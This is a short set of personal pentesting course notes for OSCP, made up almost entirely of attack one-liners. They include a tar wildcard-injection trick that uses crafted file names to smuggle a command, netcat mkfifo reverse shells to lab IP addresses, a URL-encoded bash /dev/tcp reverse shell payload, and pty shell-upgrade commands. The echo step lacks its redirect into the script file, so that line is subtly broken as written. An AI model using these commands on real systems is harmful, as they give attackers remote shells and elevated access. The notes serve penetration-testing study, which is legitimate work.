The following is notes from my pentesting course for OSCP

If there is a app using tar * you can do the following

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.218.104 4444 >/tmp/f” shell.sh
touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”
touch “/var/www/html/–checkpoint=1”

Clean Shell using Phone on Linux

python -c ‘import pty; pty.spawn(“/bin/bash”)’

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

# Simple shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.35 443 >/tmp/f

# Bash Reverse Shell

bash+-c+’bash+-i+>%26+/dev/tcp/10.10.14.14/443+0>%261’%26host=

More of a read

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/